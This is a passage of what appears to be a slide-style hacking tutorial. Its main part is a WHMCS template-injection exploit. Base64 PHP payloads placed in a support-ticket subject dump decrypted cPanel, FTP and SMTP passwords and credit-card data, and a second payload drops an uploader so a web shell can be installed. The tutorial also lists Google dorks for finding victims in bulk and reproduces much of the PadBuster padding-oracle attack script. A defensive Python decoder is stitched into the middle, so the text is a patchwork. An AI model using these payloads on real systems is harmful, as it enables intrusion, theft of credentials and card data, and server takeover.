MjI1xyXG4iOw0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF 1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSBkb2 1haW5zdGF0dXM9J0FjdGl2ZSciKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0 Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KCWlmICgoJHZbJ3VzZXJuYW1lJ10gKSBhbmQgKCR2 WydwYXNzd29yZCddKSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9 tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdls ndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRj Y19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ 10uIlxyXG4iOw0KICAgIH0NCgl9DQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIENsaWVudCBIT1NUICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4i Ow0KCQ0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCSRxdWVye SA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIGB0YmxjbGllbnRzYCBXSEVSRSBjY XJkdHlwZSA8PiAnJyBvcmRlciBieSBpc3N1ZW51bWJlciBkZXNjIik7DQoNCgkNCndoaWxl KCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KJGNjaGFzaCA9IG1kNSggJ
    GNjX2VuY3J5cHRpb25faGFzaC4kdlsnMCddKTsNCiRzPSAgbXlzcWxfcXVlcnkoInNlbGVjd CBjYXJkdHlwZSxBRVNfREVDUllQVChjYXJkbnVtLCd7JGNjaGFzaH0nKSBhcyBjYXJkbn VtLEFFU19ERUNSWVBUKGV4cGRhdGUsJ3skY2NoYXNofScpIGFzIGV4cGRhdGUsQUV TX0RFQ1JZUFQoaXNzdWVudW1iZXIsJ3skY2NoYXNofScpIGFzIGlzc3VlbnVtYmVyLEFF U19ERUNSWVBUKHN0YXJ0ZGF0ZSwneyRjY2hhc2h9JykgYXMgc3RhcnRkYXRlICBGUk 9NIGB0YmxjbGllbnRzYCB3aGVyZSBpZD0nIi4kdlsnMCddLiInIiApOw0KDQokdjI9bXlzcW xfZmV0Y2hfYXJyYXkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0uInwiLi R2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiLiR2Mls0XTsNCn0NCg0KDQogICANCiA NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IEN DICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCWVjaG8oJHRleHQpOw =='));exit;{/php} ______________________________________________________________________________ and scroll downfill the Captcha click the submit button we will be redirected to next page where it will show cpanel username and password boom ! you have cpanel usernames and passwords of hosting panel,website hosted on that server if you are lucky , you may also get the FTP and SMTP passwords too !
    ok it wasall about the the cpanel,FTP and SMTP passwords if whmcs dont have any website hosted on it you wont get anything then ???????? dont be sad :) we have one more trick and this will help you to upload the shell on whmcs website :) how ??? lets move :) come back to the submit ticket page put any random info in email,name and urgency field main step is to put the php code in subject field this time we are going to put the php code, if it got executed successfully we will get a uploader on the website through which we will be able to upload shell on the website so lets start fill the any random info in other fields and put this php code in subject field {php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMy VjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNp QTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ 0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5Y VnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpU RVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05 sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0Fn SUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFF vZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4b FgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIy NWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93ME tmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQl BVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUz FrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlV pUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZ
G1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRm aWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlK CRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}
______________________________________________________________________________
Fill in the captcha and submit. Now look at the submit ticket URL, for example:
http://www.website.com/client/submitticket.php
When the code executes it writes downloads/indexx.php (note the double x) containing a file uploader, so replace submitticket.php in the URL with downloads/indexx.php and open:
http://www.website.com/client/downloads/indexx.php
You will see a file upload form. Browse to your shell and click Upload, then open:
http://www.website.com/client/downloads/shell_name.php
Hell yeah, owned :D
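Both payloads above are opaque as printed: they are base64 inside base64 and were line-wrapped when pasted. The Python below is an added example, not from the page, that a reviewer or defender can run over a ticket subject to pull out the {php}...{/php} body, peel the nested base64_decode() layers (stripping the line-wrap whitespace first), and report which tables the PHP reads and whether it writes files. The embedded sample subject is constructed to have the same shape as the page's payloads (a tblservers dump plus an indexx.php dropper); to inspect the real ones, paste the subject string from the page in place of it.

```python
import base64
import re
import textwrap

PHP_TAG = re.compile(r"\{php\}(.*?)\{/php\}", re.S | re.I)
B64_ARG = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", re.I)
TABLE_REF = re.compile(r"\bFROM\s+`?(\w+)`?", re.I)
FILE_WRITE = re.compile(r"\b(fopen|fwrite|file_put_contents|move_uploaded_file)\s*\(")


def decode_layers(php, max_depth=5):
    """Peel nested base64_decode('...') arguments; returns the decoded strings, outermost first."""
    layers, current = [], php
    for _ in range(max_depth):
        m = B64_ARG.search(current)
        if not m:
            break
        cleaned = re.sub(r"\s+", "", m.group(1))  # undo the whitespace a line-wrapped paste adds
        current = base64.b64decode(cleaned).decode("utf-8", "replace")
        layers.append(current)
    return layers


def analyze_subject(subject):
    """Triage a ticket subject: is it a Smarty {php} injection, and what does the PHP do?"""
    report = {"php_tag": False, "layers": [], "tables": [], "writes_files": False}
    m = PHP_TAG.search(subject)
    if not m:
        return report
    report["php_tag"] = True
    report["layers"] = decode_layers(m.group(1))
    code = "\n".join(report["layers"]) or m.group(1)  # unencoded {php} bodies are analysed as-is
    report["tables"] = sorted(set(t.lower() for t in TABLE_REF.findall(code)))
    report["writes_files"] = bool(FILE_WRITE.search(code))
    return report


# Constructed sample with the same shape as the page's payloads (not the page's actual blobs).
_INNER = ("<?php\nif(isset($_POST['Submit'])){ move_uploaded_file($_FILES['image']['tmp_name'], "
          "$_FILES['image']['name']); }\n?>")
_OUTER = (
    "include('configuration.php');\n"
    "$q = mysql_query(\"SELECT * FROM tblservers\");\n"
    "$c = base64_decode(\"" + base64.b64encode(_INNER.encode()).decode() + "\");\n"
    "$f = fopen('downloads/indexx.php', 'w'); fwrite($f, $c); fclose($f);\n"
)
_WRAPPED = "\n ".join(textwrap.wrap(base64.b64encode(_OUTER.encode()).decode(), 60))
SAMPLE_SUBJECT = "{php}evaL(base64_decode('" + _WRAPPED + "'));exit;{/php}"

if __name__ == "__main__":
    r = analyze_subject(SAMPLE_SUBJECT)
    print("php tag:", r["php_tag"], "| tables:", r["tables"], "| writes files:", r["writes_files"])
    for i, layer in enumerate(r["layers"], 1):
        print(f"--- layer {i} ---\n{layer}")
```

The same check, run on the subject field before it reaches the template engine, is a cheap server-side guard; the real fix is never to render user input as a Smarty template and to keep the {php} tag disabled.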
WHMCS Auto Exploiter

 Take a WHMCS auto exploiter PHP script and upload it to some PHP server.
 In the Google dork field make your own dork and click Exploit. Dorks such as:
inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:"Powered by WHMCompleteSolution"
inurl:clientarea.php
inurl:announcements.php
intext:"WHMCompleteSolution"
intext:"Powered by WHMCS"
 Crack the hash.
 Go to the site, open the admin panel and log in.
    Oracle Padding AttackUsing Brup Suite Requiements :  MicrosoftSQlServer 2008 R2  Brup Suit Professionalv1.4.07  exe.bat[ Save it in notepad and rename as exe.bat ] @echo off cmd  padBuster.pl [ Save it in notepad and rename as padBuster.pl ] #!/usr/bin/perl # # PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks # Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com) # # Credits to J.Rizzo and T.Duong for providing proof of concept web exploit # techniques and S.Vaudenay for initial discovery of the attack. Credits also # to James M. Martin (research@esptl.com) for sharing proof of concept exploit # code for performing various brute force attack techniques, and wireghoul (Eldar # Marcussen) for making code quality improvements. # use LWP::UserAgent; use strict; use warnings; use Getopt::Std; use MIME::Base64;
  • 236.
    use URI::Escape; use Getopt::Long; useTime::HiRes qw( gettimeofday ); use Compress::Zlib; use Crypt::SSLeay; # Set defaults with $variable = value my $logFiles; my $post; my $encoding = 0; my $headers; my $cookie; my $error; my $prefix; my $intermediaryInput; my $cipherInput; my $plainTextInput; my $encodedPlainTextInput; my $noEncodeOption; my $superVerbose; my $proxy; my $proxyAuth; my $noIv; my $auth; my $resumeBlock; my $interactive = 0;
  • 237.
    my $bruteForce; my $ignoreContent; my$useBody; my $verbose; GetOptions( "log" => $logFiles, "post=s" => $post, "encoding=s" => $encoding, "headers=s" => $headers, "cookies=s" => $cookie, "error=s" => $error, "prefix=s" => $prefix, "intermediate=s" => $intermediaryInput, "ciphertext=s" => $cipherInput, "plaintext=s" => $plainTextInput, "encodedtext=s" => $encodedPlainTextInput, "noencode" => $noEncodeOption, "veryverbose" => $superVerbose, "proxy=s" => $proxy, "proxyauth=s" => $proxyAuth, "noiv" => $noIv, "auth=s" => $auth, "resume=s" => $resumeBlock, "interactive" => $interactive, "bruteforce" => $bruteForce, "ignorecontent" => $ignoreContent,
  • 238.
    "usebody" => $useBody, "verbose"=> $verbose); print "n+-------------------------------------------+n"; print "| PadBuster - v0.3.3 |n"; print "| Brian Holyfield - Gotham Digital Science |n"; print "| labs@gdssecurity.com |n"; print "+-------------------------------------------+n"; if ($#ARGV < 2) { die " Use: padBuster.pl URL EncryptedSample BlockSize [options] Where: URL = The target URL (and query string if applicable) EncryptedSample = The encrypted value you want to test. Must also be present in the URL, PostData or a Cookie BlockSize = The block size being used by the algorithm Options: -auth [username:password]: HTTP Basic Authentication -bruteforce: Perform brute force against the first block -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded) -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2) -encoding [0-4]: Encoding Format of Sample (Default 0) 0=Base64, 1=Lower HEX, 2=Upper HEX 3=.NET UrlToken, 4=WebSafe Base64
  • 239.
    -encodedtext [Encoded String]:Data to Encrypt (Encoded) -error [Error String]: Padding Error Message -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2) -interactive: Prompt for confirmation on decrypted bytes -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded) -log: Generate log files (creates folder PadBuster.DDMMYY) -noencode: Do not URL-encode the payload (encoded by default) -noiv: Sample does not include IV (decrypt first block) -plaintext [String]: Plain-Text to Encrypt -post [Post Data]: HTTP Post Data String -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) -proxy [address:port]: Use HTTP/S Proxy -proxyauth [username:password]: Proxy Authentication -resume [Block Number]: Resume at this block number -usebody: Use response body content for response analysis phase -verbose: Be Verbose -veryverbose: Be Very Verbose (Debug Only) ";} # Ok, if we've made it this far we are ready to begin.. my $url = $ARGV[0]; my $sample = $ARGV[1]; my $blockSize = $ARGV[2]; if ($url eq "" || $sample eq "" || $blockSize eq "") {
  • 240.
    print "nERROR: TheURL, EncryptedSample and BlockSize cannot be null.n"; exit(); } # Hard Coded Inputs #$post = ""; #$sample = ""; my $method = $post ? "POST" : "GET"; # These are file related variables my $dirName = "PadBuster." . &getTime("F"); my $dirSlash = "/"; my $dirCmd = "mkdir "; if (defined($ENV{'OS'})) { if ($ENV{OS} =~ /Windows/) { $dirSlash = ""; $dirCmd = "md "; } } my $dirExists = 0; my $printStats = 0; my $requestTracker = 0; my $timeTracker = 0; if ($encoding < 0 || $encoding > 4) {
  • 241.
    print "nERROR: Encodingmust be a value between 0 and 4n"; exit(); } my $encodingFormat = $encoding ? $encoding : 0; my $encryptedBytes = $sample; my $totalRequests = 0; # See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem) if ($sample =~ /%/) { $encryptedBytes = &uri_unescape($encryptedBytes) } # Prep the sample for regex use $sample = quotemeta $sample; # Now decode $encryptedBytes = &myDecode($encryptedBytes, $encodingFormat); if ( (length($encryptedBytes) % $blockSize) > 0) { print "nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)n"; print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.n"; exit(); }
  • 242.
    # If noIV, then append nulls as the IV (only if decrypting) if ($noIv && !$bruteForce && !$plainTextInput) { $encryptedBytes = "x00" x $blockSize . $encryptedBytes; } # PlainTextBytes is where the complete decrypted sample will be stored (decrypt only) my $plainTextBytes; # This is a bool to make sure we know where to replace the sample string my $wasSampleFound = 0; # ForgedBytes is where the complete forged sample will be stored (encrypt only) my $forgedBytes; # Isolate the IV into a separate byte array my $ivBytes = substr($encryptedBytes, 0, $blockSize); # Declare some optional elements for storing the results of the first test iteration # to help the user if they don't know what the padding error looks like my @oracleCantidates; my $oracleSignature = ""; my %oracleGuesses; my %responseFileBuffer; # The block count should be the sample divided by the blocksize my $blockCount = int(length($encryptedBytes)) / int($blockSize);
  • 243.
    if (!$bruteForce &&!$plainTextInput && $blockCount < 2) { print "nERROR: There is only one block. Try again using the -noiv option.n"; exit(); } # The attack works by sending in a real cipher text block along with a fake block in front of it # You only ever need to send two blocks at a time (one real one fake) and just work through # the sample one block at a time # First, re-issue the original request to let the user know if something is potentially broken my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie); &myPrint("nINFO: The original request returned the following",0); &myPrint("[+] Status: $status",0); &myPrint("[+] Location: $location",0); &myPrint("[+] Content Length: $contentLengthn",0); &myPrint("[+] Response: $contentn",1); $plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput; if ($bruteForce) { &myPrint("INFO: Starting PadBuster Brute Force Mode",0); my $bfAttempts = 0;
  • 244.
    print "INFO: Resumingprevious brute force at attempt $resumeBlockn" if $resumeBlock; # Only loop through the first 3 bytes...this should be enough as it # requires 16.5M+ requests my @bfSamples; my $sampleString = "x00" x 2; for my $c (0 ... 255) { substr($sampleString, 0, 1, chr($c)); for my $d (0 ... 255) { substr($sampleString, 1, 1, chr($d)); push (@bfSamples, $sampleString); } } foreach my $testVal (@bfSamples) { my $complete = 0; while ($complete == 0) { my $repeat = 0; for my $b (0 ... 255) { $bfAttempts++; if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) { #SKIP } else {
  • 245.
    my $testBytes =chr($b).$testVal; $testBytes .= "x00" x ($blockSize-3); my $combinedBf = $testBytes; $combinedBf .= $encryptedBytes; $combinedBf = &myEncode($combinedBf, $encoding); # Add the Query String to the URL my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf); # Issue the request my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies); my $signatureData = "$statust$contentLengtht$location"; $signatureData = "$statust$contentLengtht$locationt$content" if $useBody; if ($oracleSignature eq "") { &myPrint("[+] Starting response analysis...n",0) if ($b ==0); $oracleGuesses{$signatureData}++; $responseFileBuffer{$signatureData} = "Status: $statusnLocation: $locationnContent-Length: $contentLengthnContent:n$content"; if ($b == 255) { &myPrint("*** Response Analysis Complete ***n",0); &determineSignature();
  • 246.
    $printStats = 1; $timeTracker= 0; $requestTracker = 0; $repeat = 1; $bfAttempts = 0; } } if ($oracleSignature ne "" && $oracleSignature ne $signatureData) { &myPrint("nAttempt $bfAttempts - Status: $status - Content Length: $contentLengthn$testUrln",0); &writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrlnPost Data: $testPostnCookies: $testCookiesnnStatus: $statusnLocation: $locationnContent-Length: $contentLengthnContent:n$content"); } } } ($repeat == 1) ? ($complete = 0) : ($complete = 1); } } } elsif ($plainTextInput) { # ENCRYPT MODE &myPrint("INFO: Starting PadBuster Encrypt Mode",0); # The block count will be the plaintext divided by blocksize (rounded up) my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99); &myPrint("[+] Number of Blocks: ".$blockCount."n",0);
  • 247.
    my $padCount =($blockSize * $blockCount) - length($plainTextInput); $plainTextInput.= chr($padCount) x $padCount; # SampleBytes is the encrypted text you want to derive intermediate values for, so # copy the current ciphertext block into sampleBytes # Note, nulls are used if not provided and the intermediate values are brute forced $forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "x00" x $blockSize; my $sampleBytes = $forgedBytes; for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) { # IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored my $intermediaryBytes; if ($intermediaryInput && $blockNum == $blockCount) { $intermediaryBytes = &myDecode($intermediaryInput,2); } else { $intermediaryBytes = &processBlock($sampleBytes); } # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block # This will become the next ciphertext block (or IV if the last one) $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize); $forgedBytes = $sampleBytes.$forgedBytes;
  • 248.
    &myPrint("nBlock ".($blockNum)." Results:",0); &myPrint("[+]New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."n",0); } $forgedBytes = &myEncode($forgedBytes, $encoding); chomp($forgedBytes); } else { # DECRYPT MODE &myPrint("INFO: Starting PadBuster Decrypt Mode",0); if ($resumeBlock) { &myPrint("INFO: Resuming previous exploit at Block $resumeBlockn",0); } else { $resumeBlock = 1 } # Assume that the IV is included in our sample and that the first block is the IV for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) { # Since the IV is the first block, our block count is artificially inflated by one &myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***n",0); # SampleBytes is the encrypted text you want to break, so
  • 249.
    # lets copythe current ciphertext block into sampleBytes my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize); # IntermediaryBytes is where the the intermediary bytes produced by the algorithm are stored my $intermediaryBytes = &processBlock($sampleBytes); # DecryptedBytes is where the decrypted block is stored my $decryptedBytes; # Now we XOR the decrypted byte with the corresponding byte from the previous block # (or IV if we are in the first block) to get the actual plain-text $blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes : $decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize); &myPrint("nBlock ".($blockNum-1)." Results:",0); &myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0); &myPrint("[+] Plain Text: $decryptedBytesn",0); $plainTextBytes = $plainTextBytes.$decryptedBytes; } } &myPrint("-------------------------------------------------------",0);
  • 250.
    &myPrint("** Finished ***n",0); if ($plainTextInput) { &myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0); } else { &myPrint("[+] Decrypted value (ASCII): $plainTextBytesn",0); &myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."n", 0); &myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."n", 0); } &myPrint("-------------------------------------------------------n",0); sub determineSignature { # Help the user detect the oracle response if an error string was not provided # This logic will automatically suggest the response pattern that occured most often # during the test as this is the most likeley one my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses; &myPrint("The following response signatures were returned:n",0); &myPrint("-------------------------------------------------------",0); if ($useBody) { &myPrint("ID#tFreqtStatustLengthtChksumtLocation",0); } else { &myPrint("ID#tFreqtStatustLengthtLocation",0); } &myPrint("-------------------------------------------------------",0);
  • 251.
    my $id =1; foreach (@sortedGuesses) { my $line = $id; ($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.=""; my @sigFields = split("t", $_); $line .= "t$oracleGuesses{$_}t$sigFields[0]t$sigFields[1]"; $useBody ? ( $line .= "t".unpack( '%32A*', $sigFields[3] ) ) : $line.=""; $line .= "t$sigFields[2]"; &myPrint($line,0); &writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_}); $id++; } &myPrint("-------------------------------------------------------",0); if ($#sortedGuesses == 0 && !$bruteForce) { &myPrint("nERROR: All of the responses were identical.n",0); &myPrint("Double check the Block Size and try again.",0); exit(); } else { my $responseNum = &promptUser("nEnter an ID that matches the error conditionnNOTE: The ID# marked with ** is recommended"); &myPrint("nContinuing test with selection $responseNumn",0); $oracleSignature = $sortedGuesses[$responseNum-1]; }
  • 252.
}

sub prepRequest {
    my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_;
    # Prepare the request: substitute the test bytes wherever the sample appears
    my $testUrl = $pUrl;
    my $wasSampleFound = 0;
    if ($pUrl =~ /$pSample/) {
        $testUrl =~ s/$pSample/$pTestBytes/;
        $wasSampleFound = 1;
    }
    my $testPost = "";
    if ($pPost) {
        $testPost = $pPost;
        if ($pPost =~ /$pSample/) {
            $testPost =~ s/$pSample/$pTestBytes/;
            $wasSampleFound = 1;
        }
    }
    my $testCookies = "";
    if ($pCookie) {
        $testCookies = $pCookie;
        if ($pCookie =~ /$pSample/) {
            $testCookies =~ s/$pSample/$pTestBytes/;
            $wasSampleFound = 1;
        }
    }
    if ($wasSampleFound == 0) {
        &myPrint("ERROR: Encrypted sample was not found in the test request",0);
        exit();
    }
    return ($testUrl, $testPost, $testCookies);
}

sub processBlock {
    my ($sampleBytes) = @_;
    my $analysisMode;
    # Analysis mode is either 0 (response analysis) or 1 (exploit)
    $analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1;
    # The return value of this subroutine is the intermediate text for the block
    my $returnValue;
    my $complete = 0;
    my $autoRetry = 0;
    my $hasHit = 0;
    while ($complete == 0) {
        # Reset the return value
        $returnValue = "";
        my $repeat = 0;
        # TestBytes are the fake bytes that are prepended to the cipher text for the padding attack
        my $testBytes = "\x00" x $blockSize;
        my $falsePositiveDetector = 0;
        # Work on one byte at a time, starting with the last byte and moving backwards
        OUTERLOOP:
        for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
            INNERLOOP:
            for (my $i = 255; $i >= 0; $i--) {
                # Fuzz the test byte
                substr($testBytes, $byteNum, 1, chr($i));
                # Combine the test bytes and the sample
                my $combinedTestBytes = $testBytes.$sampleBytes;
                if ($prefix) {
                    $combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes;
                }
                $combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);
                chomp($combinedTestBytes);
                if (! $noEncodeOption) {
                    $combinedTestBytes = &uri_escape($combinedTestBytes);
                }
                my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes);
                # Ok, now make the request
                my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);
                my $signatureData = "$status\t$contentLength\t$location";
                $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
                # If this is the first block and there is no padding error message defined, then cycle through
                # all possible requests and let the user decide what the padding error behavior is.
                if ($analysisMode == 0) {
                    &myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);
                    $oracleGuesses{$signatureData}++;
                    $responseFileBuffer{$signatureData} = "URL: $testUrl\nPostData: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
                    if ($byteNum == $blockSize - 1 && $i == 0) {
                        &myPrint("*** Response Analysis Complete ***\n",0);
                        &determineSignature();
                        $analysisMode = 1;
                        $repeat = 1;
                        last OUTERLOOP;
                    }
                }
                my $continue = "y";
                if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
                    # This is for autoretry logic (only works on the first byte)
                    if ($autoRetry == 1 && ($byteNum == ($blockSize - 1)) && $hasHit == 0) {
                        $hasHit++;
                    } else {
                        # If there was no padding error, then it worked
                        &myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
                        &myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum,1)),1);
                        # If continually getting a hit on attempt zero, then something is probably wrong
                        $falsePositiveDetector++ if ($i == 255);
                        if ($interactive == 1) {
                            $continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1);
                        }
                        if ($continue eq "y" || $continue eq "a") {
                            $interactive = 0 if ($continue eq "a");
                            # Next, calculate the decrypted byte by XORing it with the padding value
                            my ($currentPaddingByte, $nextPaddingByte);
                            # These variables could allow for flexible padding schemes (for now PKCS)
                            # For PKCS#7, the padding byte is equal to chr($blockSize - $byteNum)
                            $currentPaddingByte = chr($blockSize - $byteNum);
                            $nextPaddingByte = chr($blockSize - $byteNum + 1);
                            my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte;
                            &myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1);
                            $returnValue = $decryptedByte.$returnValue;
                            &myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);
                            # Finally, update the test bytes in preparation for the next round, based on the padding used
                            for (my $k = $byteNum; $k < $blockSize; $k++) {
                                # First, XOR the current test byte with the padding value for this round to recover the decrypted byte
                                substr($testBytes, $k, 1, (substr($testBytes, $k, 1) ^ $currentPaddingByte));
                                # Then, XOR it again with the padding byte for the next round
                                substr($testBytes, $k, 1, (substr($testBytes, $k, 1) ^ $nextPaddingByte));
                            }
                            last INNERLOOP;
                        }
                    }
                }
                ## TODO: Combine these two blocks?
                if ($i == 0 && $analysisMode == 1) {
                    # End of the road with no success. We should probably try again.
                    &myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0);
                    if ($autoRetry == 0) {
                        $autoRetry = 1;
                        &myPrint("       Automatically trying one more time...",0);
                        $repeat = 1;
                        last OUTERLOOP;
                    } else {
                        if (($byteNum == $blockSize - 1) && ($error)) {
                            &myPrint("\nAre you sure you specified the correct error string?",0);
                            &myPrint("Try re-running without the -e option to perform a response analysis.\n",0);
                        }
                        $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
                        if ($continue ne "n") {
                            &myPrint("INFO: Switching to interactive mode",0);
                            $interactive = 1;
                            $repeat = 1;
                            last OUTERLOOP;
                        }
                    }
                }
                if ($falsePositiveDetector == $blockSize) {
                    &myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);
                    &myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);
                    if ($error) {
                        &myPrint("[+] Check the error string you provided and try again, or consider running",0);
                        &myPrint("[+] without an error string to perform an automated response analysis.\n",0);
                    } else {
                        &myPrint("[+] You may want to consider defining a custom padding error string",0);
                        &myPrint("[+] instead of the automated response analysis.\n",0);
                    }
                    $continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
                    if ($continue eq "y") {
                        &myPrint("INFO: Switching to interactive mode",0);
                        $interactive = 1;
                        $repeat = 1;
                        last OUTERLOOP;
                    }
                }
            }
        }
        ($repeat == 1) ? ($complete = 0) : ($complete = 1);
    }
